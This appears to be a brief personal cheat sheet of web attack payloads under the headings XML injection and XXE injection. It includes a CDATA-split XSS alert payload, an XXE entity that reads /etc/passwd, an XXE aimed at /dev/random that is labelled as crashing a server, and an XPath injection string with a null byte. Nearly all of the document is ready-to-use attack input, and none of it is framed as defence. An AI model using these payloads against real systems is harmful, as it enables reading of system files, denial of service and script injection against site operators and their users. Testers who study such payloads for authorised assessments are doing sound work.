


                                     XML INJECTION
									 
									 
									 
									 
				' - throughs XML errror

                " - ,, ,, ,, ,, 

                ><

				
				
				
				xss through xml
				<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
				
				
				
				
				                  XXE INJECTION
								  
								  
								  
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><test>&xxe;</test> url encode		



crash server - <!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo>



' or 1=1]%00
		